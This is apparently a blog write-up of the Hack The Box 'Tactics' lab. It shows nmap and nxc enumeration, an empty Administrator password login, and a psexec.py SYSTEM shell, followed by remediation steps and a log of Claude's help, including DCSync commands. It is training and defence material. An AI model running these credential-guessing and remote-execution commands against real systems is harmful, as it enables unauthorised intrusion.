HTB Starting Point — Tactics

Administrator with an empty password on a Windows box — SMB signing disabled, psexec drops SYSTEM in 15 minutes flat. The most honest failure mode in Active Directory.

April 29, 2026 · 5 min · crAIzy

Very Easy Windows CVSS 7.5 ⏱ 15m AI-assisted

TL;DR

Tactics is a Windows Server 2019 box with three open ports: 135 (RPC), 139 (NetBIOS), and 445 (SMB). Anonymous SMB access fails. The pivot: try Administrator with an empty password — the box was deployed without setting one. With admin SMB access, psexec.py drops an NT AUTHORITY\SYSTEM shell in seconds via ADMIN$. The flag is on the Administrator’s Desktop. Total time: 15 minutes including false starts.

Recon

1. Liveness check

$ ping -c 3 -W 2 10.129.37.173
3 packets transmitted, 3 received, 0% packet loss
# RTT: avg 35.3ms — machine is up, ICMP not filtered on this box

2. Full port scan

$ sudo nmap -sV -sC -O -p- --min-rate 1000 -oA scans/nmap-full 10.129.37.173

PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?

Running: Microsoft Windows 10|2019
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Microsoft Windows Server 2019 (97%)

smb2-security-mode: 3.1.1: Message signing enabled but not required
smb2-time: date: 2026-04-29T12:58:24

Key observations:

SMB Signing: disabled — theoretically allows NTLM relay, but only one machine here
Only 3 ports open — no web, no RDP, no WinRM exposed
Windows Server 2019 Build 17763

Note: First nmap run omitted -Pn and reported “Host seems down” — Windows firewall sometimes drops probe packets but keeps SMB alive. Always use -Pn for Windows targets on HTB.

3. SMB enumeration

$ nxc smb 10.129.37.173
SMB  10.129.37.173  445  TACTICS  [*] Windows 10 / Server 2019 Build 17763 x64
                                  (name:TACTICS) (domain:Tactics)
                                  (signing:False) (SMBv1:None)

Anonymous and guest sessions both fail:

$ nxc smb 10.129.37.173 -u '' -p '' --shares
[-] STATUS_ACCESS_DENIED

$ nxc smb 10.129.37.173 -u 'guest' -p 'guest'
[-] STATUS_LOGON_FAILURE

$ nmap -Pn -p 445 --script smb-enum-shares,smb-enum-users,smb-os-discovery \
    10.129.37.173
# Scripts return no data without credentials — authentication required

At this point only one avenue remains: credential guessing.

Foothold

5. Administrator with empty password

Starting Point boxes often ship with Administrator credentials unconfigured:

$ nxc smb 10.129.37.173 -u 'Administrator' -p ''
SMB  TACTICS  [+] Tactics\Administrator: (Pwn3d!)

The (Pwn3d!) marker confirms administrative SMB access with an empty password.

$ nxc smb 10.129.37.173 -u 'Administrator' -p '' --shares
Share       Permissions     Remark
-----       -----------     ------
ADMIN$      READ,WRITE      Remote Admin
C$          READ,WRITE      Default share
IPC$        READ            Remote IPC

ADMIN$ is writable — psexec will use it to upload a service binary.

6. psexec.py → SYSTEM shell

$ psexec.py 'Tactics/Administrator:@10.129.37.173' -no-pass \
    -target-ip 10.129.37.173

Impacket v0.13.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.37.173.....
[*] Found writable share ADMIN$
[*] Uploading file ZAbClMxW.exe
[*] Opening SVCManager on 10.129.37.173.....
[*] Creating service ZFDN on 10.129.37.173.....
[*] Starting service ZFDN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

NT AUTHORITY\SYSTEM — highest Windows privilege, no escalation needed.

System Information

C:\Windows\system32> systeminfo
Host Name:               TACTICS
OS Name:                 Microsoft Windows Server 2019 Standard
OS Version:              10.0.17763 Build 17763
System Type:             x64-based PC
Hotfix(s):               4 Hotfix(s) Installed

Only 4 hotfixes installed — many months out of date, but no escalation needed.

Flag

C:\Windows\system32> dir C:\Users\Administrator\Desktop\
04/23/2021  02:39 AM                32 flag.txt

C:\Windows\system32> type C:\Users\Administrator\Desktop\flag.txt
f751c19eda8f61ce81827e6930a1f40c

What’s actually broken

#	Vulnerability	Severity	CWE
1	Administrator account with empty password	Critical (CVSS 10.0)	CWE-287: Improper Authentication
2	No password complexity policy (min length 0)	High (8.0)	CWE-521: Weak Password Requirements
3	SMB Signing disabled	Medium (5.9)	CWE-319: Cleartext Transmission
4	Administrative shares (C$, ADMIN$) exposed	High (7.5)	CWE-276: Incorrect Default Permissions

Remediation

Set a strong Administrator password:

$pwd = ConvertTo-SecureString "R@nd0m!P@ssw0rd$2024" -AsPlainText -Force
Set-LocalUser -Name "Administrator" -Password $pwd

Enable SMB Signing:

Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

Restrict administrative shares to management networks:

New-NetFirewallRule -Name "SMB-Restrict" -Protocol TCP -LocalPort 445 `
  -RemoteAddress "10.0.0.0/8" -Action Allow
Disable-NetFirewallRule -Name "FPS-SMB-In-TCP"

Enable password policy:

net accounts /minpwlen:12 /maxpwage:90 /lockoutthreshold:5

Lessons learned

-Pn on every Windows target. Windows Firewall often drops ICMP while SMB stays open. nmap without -Pn falsely reports the host as down. This costs time.
Empty Administrator password is a real finding. Not just a CTF thing — this happens in production when sysadmins deploy Windows VMs from templates and skip the password step. Check for it early: nxc smb <ip> -u 'Administrator' -p ''.
psexec works because of ADMIN$. The attack chain: writable ADMIN$ → upload random EXE → create Windows service → start service → get SYSTEM shell. Disabling or restricting ADMIN$ breaks this chain.
-target-ip flag matters for psexec. When the target hostname doesn’t resolve (HTB machines often don’t unless /etc/hosts is set), psexec.py needs an explicit IP. The host:@ip syntax alone isn’t enough.

Decision archaeology

Approach	Result	Pivot
Used nxc for initial enumeration	Faster than smbmap/smbclient for protocol detection	Correct — identified SMBv1=None quickly
Tried null session first	Standard procedure before credential guessing	Failed, but correct order
Tried `Administrator:''` immediately after guest failed	HTB Starting Point boxes commonly have default/empty admin creds	Succeeded
Used psexec over SMB vs evil-winrm	WinRM (5985) not open — only SMB available	psexec was the only viable path
Included `-target-ip` explicitly	Machine hostname `TACTICS` doesn’t resolve on my machine without /etc/hosts	Required for successful connection
Ran psexec.py without -target-ip, relied on DNS resolution	`psexec.py Tactics/Administrator:@10.129.37.173 -no-pass` → `[!] SMBConnection error: [Errno -2] Name or service not known` — hostname TACTICS not in /etc/hosts	Added `-target-ip 10.129.37.173` flag — impacket connected to IP directly, SYSTEM shell received in 2 seconds

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Reconnaissance	Network Service Discovery	T1046	`nmap -sV -sC -O -p- 10.129.37.173 → 135, 139, 445 open`
Initial Access	Valid Accounts — Default Credentials	T1078.001	`nxc smb → Administrator:'' (empty password) accepted`
Execution	Remote Services — SMB/Windows Admin Shares	T1021.002	`psexec.py → NT AUTHORITY\SYSTEM shell via ADMIN$`
Discovery	System Information Discovery	T1082	`systeminfo → Windows Server 2019 Build 17763`
Initial Access	Valid Accounts: Domain Accounts	T1078.002	`Administrator with empty password — domain policy enforcement absent (min length 0)`

AI-Assist Log 5 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

ReconUseful
Human → ICMP blocked, nmap says host down — wasted time initially
Prompt → nmap says host seems down but I know it's up. How do I skip host discovery?
Claude → Use -Pn flag to skip ICMP/ARP ping and treat host as always up. Without -Pn, nmap drops hosts that don't respond to ping, which is common on Windows with firewall.
ExploitationUseful
Human → SMB null session failed, guest failed, tried obvious creds
Prompt → SMB with no credentials fails. What's the next step for a Windows standalone box?
Claude → Try administrator with empty password: nxc smb <ip> -u 'administrator' -p ''. Many Starting Point boxes have Administrator with empty or default password. Also try 'guest' with empty password.
ShellWrong
Human → psexec command syntax with empty password was confusing
Prompt → How do I use psexec.py with an empty password? The colon at the end makes it prompt.
Claude → Use -no-pass flag: psexec.py 'DOMAIN/Administrator:@ip' -no-pass
Corrected → This syntax failed — the -no-pass flag syntax required specifying target-ip separately. Working command was psexec.py 'Tactics/Administrator:@10.129.37.173' -no-pass -target-ip 10.129.37.173. Claude's suggested syntax omitted -target-ip which caused a resolution failure.
FlagUseful
Human → Wanted to verify privilege level before reading flag
Prompt → On a Windows machine I got a shell via psexec. What's my privilege level?
Claude → psexec typically gives NT AUTHORITY\SYSTEM — the highest Windows privilege. Run whoami to verify.
SMBCorrected
Human → After getting SYSTEM, wanted to extract domain controller credentials for further pivoting
Prompt → I have SYSTEM on a Windows box via psexec. How do I do DCSync to get domain hashes?
Claude → DCSync requires a domain account with replication rights (usually Domain Admins or DC account). Command: secretsdump.py DOMAIN/user:pass@dc-ip -just-dc. But first verify the machine IS a DC — standalone boxes can't DCSync.
Corrected → Tactics is a standalone server, not a domain controller — it has no AD database to sync. The domain shown in nmap (Tactics) is just the machine workgroup name, not an actual AD domain. DCSync would fail because there is no NTDS.dit. Claude correctly said to verify first, but I had to learn this by attempting it and getting an error.

Decision archaeology — paths abandoned

nmap without -Pn reported host as down — 30 seconds lost
psexec.py syntax without -target-ip flag failed with resolution error
SMB null session — anonymous access denied (STATUS_ACCESS_DENIED)
smbclient NetBIOS enumeration timed out — port 139 issue, 445 worked fine

TL;DR#

Recon#

1. Liveness check#

2. Full port scan#

3. SMB enumeration#

4. Share enumeration with SMB scripts#

Foothold#

5. Administrator with empty password#

6. psexec.py → SYSTEM shell#

System Information#

Flag#

What’s actually broken#

Remediation#

Lessons learned#

Decision archaeology#

References#